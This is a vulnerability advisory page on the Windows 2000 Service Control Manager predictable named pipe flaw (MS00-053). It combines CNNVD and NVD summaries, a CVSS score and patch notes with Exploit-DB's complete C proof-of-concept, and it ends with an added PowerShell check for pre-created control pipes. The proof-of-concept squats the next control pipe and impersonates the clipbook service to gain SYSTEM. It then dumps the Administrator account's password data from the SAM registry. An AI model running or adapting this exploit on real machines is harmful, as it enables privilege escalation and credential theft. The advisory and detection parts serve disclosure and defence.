Published: 2000-10-20 00:00:00
Revised: 2008-09-05 16:21:45

[Original] The Service Control Manager (SCM) in Windows 2000 creates predictable named pipes, which allows a local user with console access to gain administrator privileges, aka the "Service Control Manager Named Pipe Impersonation" vulnerability.

[CNNVD] Microsoft Windows 2000 Predictable Named Pipe Vulnerability (MS00-053) (CNNVD-200010-116)

        Microsoft Windows is a very popular operating system released by Microsoft.
        The Service Control Manager (services.exe) is an administrative component of Windows 2000 that allows system services to be created or modified. The SCM creates a named pipe each time a service starts. However, if a malicious program can predict and create a particular service's named pipe before that service starts, it can assume the privileges of that service. This may allow an attacker to run malicious programs with the privileges of a specific user or of the local system.

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Access complexity: LOW [exploitation is not subject to access restrictions]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)


- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources

- Vulnerability information

Microsoft Windows 2000 Predictable Named Pipe Vulnerability (MS00-053)
Medium Unknown
2000-10-20 00:00:00 2005-10-12 00:00:00

- Advisories and patches

        MS00-053:Patch Available for "Service Control Manager Named Pipe Impersonation" Vulnerability


- Vulnerability information (20133)

Microsoft Windows 2000 Named Pipes Predictability Vulnerability (EDBID:20133)
windows local
2000-08-01 Verified
0 Maceo
N/A

The Service Control Manager (SCM) is an administrative tool in Windows 2000 which handles the creation and modification of system services such as Server, Workstation, Alerter, and ClipBook. A server-side named pipe is created before each service is started and is named in a predictable sequence, which can be obtained from:


Due to the predictability of subsequent named pipes, any local user logged on interactively to a Windows 2000 machine is able to create a server-side named pipe and assume the security context of the system service the next time it is started. Arbitrary code could be attached to the named pipe, making it possible for the local user to craft an exploit that would allow them to gain Administrator account status.

/*
 *  Proof of Concept
 *  Windows2000 services named pipe vulnerability
 *  Author:  Maceo
 *  Compiled with MS VC++ 6.0 SP3
 *  Compiled and tested on:
 *     D:\>uname -sv
 *     Windows2000 5.0.2195
 *  Vulnerability:  Windows 2000 uses predictable named
 *  pipe names for controlling services.  Any user process
 *  can create a named pipe with the next name and force
 *  a service, they can start, to connect to the pipe.  Once
 *  connected the user process can impersonate the service,
 *  which in most cases runs in the SYSTEM account.
 *  Proof of concept:  This code abuses the clipbook service
 *  to run as the SYSTEM account and then dumps information
 *  from the local SAM database.
 *  This file is for educational purposes only.  As many
 *  would agree, the default install of a W2K server is
 *  inherently insecure against interactive users.  One
 *  does not have to dig very hard to find a way to
 *  elevate a users privileges when placed in an interactive
 *  situation, such as logged in at a console.  For instance:
 *     D:\>time
 *     The current time is: 23:28:38.42
 *     D:\>at 23:29 /interactive cmd.exe
 *  It is with this in mind I release the following code.
 *  Disclaimer: This file is intended as proof of concept, and
 *  is not intended to be used for illegal purposes. The author
 *  does not accept responsibility for ANY damage incurred
 *  by the use of it.
 */

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

#define ABUSE_SVC "clipbook"
#define SVC_KEY "SYSTEM\\CurrentControlSet\\Control\\ServiceCurrent"
#define SAM_KEY "SAM\\SAM\\Domains\\Account\\Users\\000001F4"

int main( )
{
  HKEY hOpen;
  DWORD dwNumber = 0;
  DWORD dwType = REG_DWORD;
  DWORD dwSize = sizeof(DWORD);
  DWORD i;
  char szNetCmd[256];

  // make sure the service we want to abuse is stopped. //
  sprintf (szNetCmd, "net stop %s", ABUSE_SVC);
  system (szNetCmd);

  // open the current service number key //
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SVC_KEY, 0, KEY_READ, &hOpen))
  {
    printf ("Failed to open key:\n  %s\n", SVC_KEY);
    return 1;
  }
  // read the key (the counter is the key's default, unnamed value) //
  if (RegQueryValueEx (hOpen, "", NULL, &dwType, (BYTE *) &dwNumber, &dwSize))
  {
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\n", SVC_KEY);
    return 2;
  }
  // close the key //
  RegCloseKey (hOpen);

  // build the next named pipe name //
  char szPipe[64];
  sprintf(szPipe, "\\\\.\\pipe\\net\\NtControlPipe%lu", ++dwNumber);
  // create the named pipe before scm can //
  // (pipe-mode argument restored: byte mode, blocking, two instances)
  HANDLE hPipe = 0;
  hPipe = CreateNamedPipe (szPipe, PIPE_ACCESS_DUPLEX,
                           PIPE_TYPE_BYTE | PIPE_READMODE_BYTE | PIPE_WAIT,
                           2, 0, 0, 0, NULL);
  if (hPipe == INVALID_HANDLE_VALUE)
  {
    printf ("Failed to create named pipe:\n  %s\n", szPipe);
    return 3;
  }

  // start the service we are going to abuse. //
  sprintf(szNetCmd, "start /min net start %s", ABUSE_SVC);
  system (szNetCmd);
  // wait for the service to connect //
  ConnectNamedPipe (hPipe, NULL);

  // read a byte of data from the client //
  if (!ReadFile (hPipe, (void *) &dwNumber, 4, &dwSize, NULL))
  {
    printf ("Failed to read the named pipe.\n");
    return 4;
  }

  // assume the identity of the client //
  if (!ImpersonateNamedPipeClient (hPipe))
  {
    printf ("Failed to impersonate the named pipe.\n");
    return 5;
  }

  // display impersonating users name //
  dwSize  = 256;
  char szUser[256];
  GetUserName(szUser, &dwSize);
  printf ("Impersonating: %s\n", szUser);

  // Assume we are SYSTEM since it is the default,
  // and let's crack open the SAM database and
  // lookup rid 500 (Administrator unless name has been changed)
  if (RegOpenKeyEx (HKEY_LOCAL_MACHINE, SAM_KEY, 0, KEY_READ, &hOpen))
  {
    printf ("Failed to open key:\n  %s\n", SAM_KEY);
    return 1;
  }

  // read the F key //
  dwSize = 2048;
  BYTE szData[2048];
  if (RegQueryValueEx (hOpen, "F", NULL, &dwType, szData, &dwSize))
  {
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\\F\n", SAM_KEY);
    return 2;
  }

  // output the key //
  printf ("Dumping SAM for RID 500 ...\n\n");
  printf ("F:0x");
  for (i = 0; i < dwSize; i++)
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("\n\n");

  // read the V key //
  dwSize = 2048;
  if (RegQueryValueEx (hOpen, "V", NULL, &dwType, szData, &dwSize))
  {
    RegCloseKey (hOpen);
    printf ("Failed to read key:\n  %s\\V\n", SAM_KEY);
    return 2;
  }

  // output the key //
  printf ("V:0x");
  for (i = 0; i < dwSize; i++)
  { printf ("%2.2x", (DWORD) szData[i]); }
  printf ("\n");

  // clean up //
  RegCloseKey (hOpen);
  return 0;
}

- Vulnerability information

Windows 2000 Service Control Manager Named Pipe Impersonation
Local Access Required Race Condition
Loss of Integrity Patch / RCS
Exploit Public Third-party Verified

- Vulnerability description

Windows 2000 contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when the Service Control Manager starts services with predictable Named Pipes, which an attacker can use to execute commands as LocalSystem. This flaw may lead to a loss of integrity.

- Timeline

2000-08-02 Unknown
2000-08-05 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Microsoft has released a patch to address this vulnerability.
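Added here as a defensive check, not part of the CNNVD record or the PoC above: a PowerShell script that reads the ServiceCurrent counter the PoC relies on, predicts the name of the next SCM control pipe, and reports whether that pipe already exists, which on a healthy host it should not except for the instant the SCM is starting a service. It assumes the pipe naming scheme and registry location described in this record are still in use on the host being checked.

```powershell
# Added detection check; not part of the CNNVD record or Maceo's PoC.
# Assumes (as the record describes) that the SCM names its control pipes
# \\.\pipe\net\NtControlPipe<N> and keeps the counter N in the default value
# of HKLM\SYSTEM\CurrentControlSet\Control\ServiceCurrent.

$PipeRoot = '\\.\pipe\'

function Get-ServiceCurrentNumber {
    $key = 'HKLM:\SYSTEM\CurrentControlSet\Control\ServiceCurrent'
    # The counter is the key's unnamed (default) REG_DWORD value.
    $value = (Get-ItemProperty -Path $key).'(default)'
    [uint32]$value
}

function Get-LiveControlPipes {
    # Listing \\.\pipe\ as a directory enumerates every open named pipe.
    [System.IO.Directory]::GetFiles($PipeRoot) |
        ForEach-Object { $_.Substring($PipeRoot.Length) } |
        Where-Object { $_ -like 'net\NtControlPipe*' }
}

function Test-ControlPipeSquatting {
    $current  = Get-ServiceCurrentNumber
    $expected = 'net\NtControlPipe{0}' -f ($current + 1)
    $live     = @(Get-LiveControlPipes)

    # The next control pipe should not exist yet: the SCM creates it only
    # at the moment it starts a service. If it is already there, either a
    # service start is in flight (re-run to confirm) or a process other
    # than the SCM pre-created it, which is the condition MS00-053 covers.
    [pscustomobject]@{
        ServiceCurrent   = $current
        ExpectedPipe     = $expected
        AlreadyExists    = ($live -contains $expected)
        LiveControlPipes = $live
    }
}

$result = Test-ControlPipeSquatting
$result | Format-List
if ($result.AlreadyExists) {
    Write-Warning "Control pipe $($result.ExpectedPipe) exists before any service start."
}
```

Run it twice a few seconds apart: a pipe that is present both times while no service is being started is worth investigating with a handle viewer to find the owning process.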

- References

- Vulnerability author